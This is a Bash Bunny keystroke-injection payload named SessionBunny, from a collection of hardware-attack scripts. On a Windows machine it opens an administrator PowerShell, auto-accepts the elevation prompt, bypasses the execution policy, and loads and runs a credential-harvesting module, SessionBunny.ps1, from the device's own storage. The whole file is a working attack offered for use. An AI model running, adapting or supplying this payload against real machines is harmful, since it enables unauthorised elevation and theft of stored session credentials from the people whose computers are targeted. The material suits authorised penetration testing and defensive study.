bashbunny-payloads/payloads/library/credentials/SessionBunny/payload.txt

#!/bin/bash
#
# Title:         SessionBunny
# Author:        0iphor13
# Version:       1.0
# Category:      Credentials
# Attackmodes:   HID, Storage

LED SETUP

Q DELAY 500

GET SWITCH_POSITION
DUCKY_LANG de

Q DELAY 500

ATTACKMODE HID STORAGE

#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING

LED STAGE1

Q DELAY 1000
RUN WIN "powershell Start-Process powershell -Verb runAs"
Q ENTER
Q DELAY 1000
Q ALT j
Q DELAY 500

Q DELAY 1000
Q STRING "powershell -exec bypass"
Q DELAY 500
Q ENTER
Q DELAY 250
Q STRING "Import-Module((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\SessionBunny.ps1')"
Q DELAY 250
Q ENTER
Q DELAY 250
Q STRING "Invoke-SessionBunny -Everything"
Q DELAY 250
Q ENTER

LED FINISH